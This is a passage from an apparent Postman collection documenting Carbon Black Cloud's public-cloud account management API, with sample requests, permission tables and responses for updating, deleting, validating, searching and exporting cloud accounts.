(CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}","regions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c486f09b-9b1b-4dc1-84a7-1be995dec298","name":"Get Regions for a Cloud Account","originalRequest":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:32:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"420"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"fde33e24-ef5b-438e-98dc-7e1bb3c73cb9"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"id\": \"us-east-1\",\n        \"name\": \"US East (N. Virginia)\",\n        \"event_channel\": {\n            \"template_version\": null,\n            \"connected\": false,\n            \"last_connected_time\": null,\n            \"create_time\": null,\n            \"update_time\": null\n        },\n        \"inventory_sync\": {\n            \"status\": \"NOT_STARTED\",\n            \"message\": null,\n            \"code\": null,\n            \"synced_by\": null,\n            \"last_sync_time\": null\n        },\n        \"create_time\": \"2023-08-31T15:26:30.713129Z\",\n        \"created_by\": \"ABCD1234\",\n        \"ssm_document\": {\n            \"version\": null,\n            \"create_time\": null,\n            \"active\": false\n        }\n    }\n]"}],"_postman_id":"924b5686-f3f2-4ac1-a6b8-6f10612e0b86"},{"name":"Update Cloud Account","id":"94abb55d-e8d0-4e33-8cda-da82811140de","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\",\n    \"name\": \"AWS Account 2\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\"\n    },\n    \"regions\": [\n        \"us-east-1\",\n        \"us-east-2\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}","description":"<h3 id=\"update-cloud-account\">Update Cloud Account</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"cloud_provider_account_id\": \"&lt;string&gt;\",\n  \"cloud_provider\": \"&lt;string&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"owner_name\": \"&lt;string&gt;\",\n  \"owner_email\": \"&lt;string&gt;\",\n  \"environment\": \"&lt;string&gt;\",\n  \"credential\": {\n    \"role_arn\": \"&lt;string&gt;\",\n    \"external_id\": \"&lt;string&gt;\"\n  },\n  \"regions\": [\"&lt;string&gt;\"],\n  \"created_by\": \"&lt;string&gt;\",\n  \"updated_by\": \"&lt;string&gt;\",\n  \"event_stream_status\": \"&lt;string&gt;\",\n  \"ssm_document_status\": \"&lt;string&gt;\",\n  \"parent_id\": \"&lt;string&gt;\",\n  \"aws_account_joined_method\": \"&lt;string&gt;\",\n  \"new_accounts_discovered\": &lt;boolean&gt;,\n  \"aws_account_type\": \"&lt;string&gt;\",\n  \"is_onboarded\": &lt;boolean&gt;,\n  \"account_discovery_status\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#update-cloud-account\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"33bcea2e-3a19-4ec9-9996-07b7065e6390","name":"Update Cloud Account","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\",\n    \"name\": \"AWS Account 2\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\"\n    },\n    \"regions\": [\n        \"us-east-1\",\n        \"us-east-2\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:33:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1043"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"7a19a107-672f-48ff-87d8-d3a0cbcebd59"}],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"AWS Account 2\",\n    \"owner_name\": \"Test\",\n    \"owner_email\": \"test@testorg.com\",\n    \"environment\": \"DEV\",\n    \"credential\": {\n        \"verification_status\": \"IN_PROGRESS\",\n        \"verification_code\": null,\n        \"verification_message\": null,\n        \"last_verified_time\": null,\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\",\n        \"application_id\": null,\n        \"tenant_id\": null,\n        \"secret_id\": null,\n        \"secret\": null,\n        \"secret_expiry\": null,\n        \"identity_provider_project_no\": null,\n        \"service_account_email\": null,\n        \"identity_pool_id\": null,\n        \"identity_provider_id\": null\n    },\n    \"last_updated_time\": \"2023-08-31T15:33:41.747068Z\",\n    \"regions\": [\n        \"us-east-1\",\n        \"us-east-2\"\n    ],\n    \"created_by\": \"ABCD1234\",\n    \"updated_by\": \"ABCD1234\",\n    \"event_stream_status\": null,\n    \"ssm_document_status\": null,\n    \"parent_id\": null,\n    \"aws_account_joined_method\": null,\n    \"new_accounts_discovered\": false,\n    \"aws_account_type\": \"INDEPENDENT\",\n    \"is_onboarded\": true,\n    \"account_discovery_status\": null,\n    \"parent_account_id\": null,\n    \"cloud_provider_account_id\": \"1234567890\",\n    \"cloud_provider\": \"AWS\"\n}"}],"_postman_id":"94abb55d-e8d0-4e33-8cda-da82811140de"},{"name":"Delete Cloud Account","id":"596a5f39-3556-437c-aaad-75baf3aea5c7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}","description":"<h3 id=\"delete-cloud-account\">Delete Cloud Account</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#delete-cloud-account\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"596a5f39-3556-437c-aaad-75baf3aea5c7"},{"name":"Bulk Delete Cloud Account","id":"7e9a5199-afae-448b-af35-e865c8506098","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_delete","description":"<h3 id=\"bulk-delete-cloud-accounts\">Bulk Delete Cloud Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n  {\n    \"cloud_provider_account_id\": \"&lt;string&gt;\",\n    \"cloud_provider\": \"&lt;string&gt;\"\n  }\n]\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#bulk-delete-cloud-accounts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","_delete"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4da4c054-268e-4f52-ae48-c8a3e719ded7","name":"Bulk Delete Cloud Account","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_delete"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 31 Aug 2023 15:34:53 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"92"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"330b163b-4fac-4820-8395-2b02754e0db7"}],"cookie":[],"responseTime":null,"body":"{\n    \"failed\": null,\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"7e9a5199-afae-448b-af35-e865c8506098"},{"name":"Validate Account Roles","id":"c5e54911-c918-4fa7-824f-3e1cf99d7c7f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\",\n        \"saved_credentials\": false,\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f81111\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/validate_role","description":"<h2 id=\"validate-account-roles\">Validate Account Roles</h2>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n  {\n    \"cloud_provider_account_id\": \"&lt;string&gt;\",\n    \"cloud_provider\": \"&lt;string&gt;\",\n    \"saved_credentials\": &lt;boolean&gt;,\n    \"role_arn\": \"&lt;string&gt;\",\n    \"external_id\": \"&lt;string&gt;\"\n  }\n]\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#validate-account-roles\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","validate_role"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ec400fd1-92c9-4d2c-9be7-5b157c6f16ed","name":"Validate Account Roles","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\",\n        \"saved_credentials\": false,\n        \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n        \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/validate_role"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:11:00 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"567"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"6f02c94a-cd83-496f-a056-0eecc63b7b32"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"validation_status\": false,\n        \"validation_code\": \"AWS_CREDENTIAL_ERROR\",\n        \"validation_message\": \"User: arn:aws:sts::11111111:assumed-role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod/694be2a6-mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot (Service: Sts, Status Code: 403, Request ID: 3b87032c-dc51-4cfc-a861-4f3419eb1593, Extended Request ID: null)\",\n        \"cloud_provider_account_id\": \"1234567890\",\n        \"cloud_provider\": \"AWS\"\n    }\n]"}],"_postman_id":"c5e54911-c918-4fa7-824f-3e1cf99d7c7f"},{"name":"Perform Action on Multiple Accounts","id":"29e25419-21bd-4399-a4e9-afbe67bd23bf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"accounts\": [\n        {\n            \"cloud_provider_account_id\": \"1234567890\",\n            \"cloud_provider\": \"AWS\",\n            \"regions\": [\n                \"us-east-1\"\n            ]\n        }\n    ],\n    \"action_type\": \"SYNC_INVENTORY\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/account_actions","description":"<h3 id=\"perform-action-on-multiple-accounts\">Perform Action on Multiple Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"accounts\": [\n    {\n      \"cloud_provider_account_id\": \"&lt;string&gt;\",\n      \"cloud_provider\": \"&lt;string&gt;\",\n      \"regions\": [ \"&lt;string&gt;\" ]\n    }\n  ],\n  \"action_type\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#perform-action-on-multiple-accounts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","account_actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"879f4c9e-7d38-42dd-8e30-b8a0f645166e","name":"Perform Action on Multiple Accounts","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"accounts\": [\n        {\n            \"cloud_provider_account_id\": \"1234567890\",\n            \"cloud_provider\": \"AWS\",\n            \"regions\": [\n                \"us-east-1\"\n            ]\n        }\n    ],\n    \"action_type\": \"SYNC_INVENTORY\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/account_actions"},"status":"Accepted","code":202,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:45:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"172"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"3048c602-28e0-4689-afb1-2d8c5d662bee"}],"cookie":[],"responseTime":null,"body":"{\n    \"failed\": null,\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Request Accepted\",\n    \"follow_up_api\": \"/orgs/ABCD1234/cloud_providers/{cloudProvider}/accounts/{accountId}/regions\"\n}"}],"_postman_id":"29e25419-21bd-4399-a4e9-afbe67bd23bf"},{"name":"Search Cloud Accounts","id":"9cd8f2bf-ab98-4ac9-a795-2958df0c04bf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"credential.verification_status\": [\n            \"IN_PROGRESS\",\n            \"SUCCESS\",\n            \"FAIL\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"credential.last_verified_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_search","description":"<h3 id=\"search-cloud-accounts\">Search Cloud Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"cloud_provider\": [ \"&lt;string&gt;\" ],\n    \"cloud_provider_account_id\": [ \"&lt;string&gt;\" ],\n    \"credential.verification_status\": [ \"&lt;string&gt;\" ],\n    \"environment\": [ \"&lt;string&gt;\" ],\n    \"parent_account_id\": [\"&lt;string&gt;\"],\n    \"is_onboarded\": &lt;boolean&gt;\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#search-cloud-accounts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b538dc97-7990-4aab-8025-3267b7466ec8","name":"Search Cloud Accounts","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"credential.verification_status\": [\n            \"IN_PROGRESS\",\n            \"SUCCESS\",\n            \"FAIL\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"credential.last_verified_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:46:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1484"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"847036dd-6d3d-4cea-92f9-1c64d28376ee"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"name\": \"AWS Account 1\",\n            \"owner_name\": \"Test\",\n            \"owner_email\": \"test@testorg.com\",\n            \"environment\": \"DEV\",\n            \"credential\": {\n                \"verification_status\": \"FAIL\",\n                \"verification_code\": \"CREDENTIAL_ERROR\",\n                \"verification_message\": \"User: arn:aws:sts::1111111:assumed-role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod/694be2a6-mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot (Service: Sts, Status Code: 403, Request ID: ac3f0cbc-099a-4657-a6bf-9f2ccc115be2, Extended Request ID: null)\",\n                \"last_verified_time\": \"2023-09-01T12:09:34.338372Z\",\n                \"role_arn\": \"arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot\",\n                \"external_id\": \"afd5813b-e3c6-471a-b30e-3a8577f89111\",\n                \"application_id\": null,\n                \"tenant_id\": null,\n                \"secret_id\": null,\n                \"secret\": null,\n                \"secret_expiry\": null,\n                \"identity_provider_project_no\": null,\n                \"service_account_email\": null,\n                \"identity_pool_id\": null,\n                \"identity_provider_id\": null\n            },\n            \"last_updated_time\": \"2023-09-01T12:09:33.873423Z\",\n            \"created_by\": \"ABCD1234\",\n            \"updated_by\": \"ABCD1234\",\n            \"event_stream_status\": \"DISABLED\",\n            \"ssm_document_status\": \"DISABLED\",\n            \"parent_id\": null,\n            \"aws_account_joined_method\": null,\n            \"new_accounts_discovered\": false,\n            \"aws_account_type\": \"INDEPENDENT\",\n            \"is_onboarded\": true,\n            \"account_discovery_status\": null,\n            \"parent_account_id\": null,\n            \"cloud_provider_account_id\": \"1234567890\",\n            \"cloud_provider\": \"AWS\"\n        }\n    ]\n}"}],"_postman_id":"9cd8f2bf-ab98-4ac9-a795-2958df0c04bf"},{"name":"Export Cloud Accounts","id":"a064e0d5-cc24-4454-838d-cd262c6d7991","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"credential.verification_status\": [\n            \"IN_PROGRESS\",\n            \"SUCCESS\",\n            \"FAIL\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"credential.last_verified_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_search/download","description":"<h3 id=\"export-cloud-accounts\">Export Cloud Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"cloud_provider\": [ \"&lt;string&gt;\" ],\n    \"cloud_provider_account_id\": [ \"&lt;string&gt;\" ],\n    \"credential.verification_status\": [ \"&lt;string&gt;\" ],\n    \"environment\": [ \"&lt;string&gt;\" ],\n    \"parent_account_id\": [\"&lt;string&gt;\"],\n    \"is_onboarded\": &lt;boolean&gt;\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#export-cloud-accounts\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","_search","download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"511ca5b9-0e71-43a8-b2c2-667cb6661699","name":"Export Cloud Accounts","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"credential.verification_status\": [\n            \"IN_PROGRESS\",\n            \"SUCCESS\",\n            \"FAIL\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"credential.last_verified_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_search/download"},"status":"OK","code":200,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:47:43 GMT"},{"key":"Content-Type","value":"text/csv"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Disposition","value":"attachment; 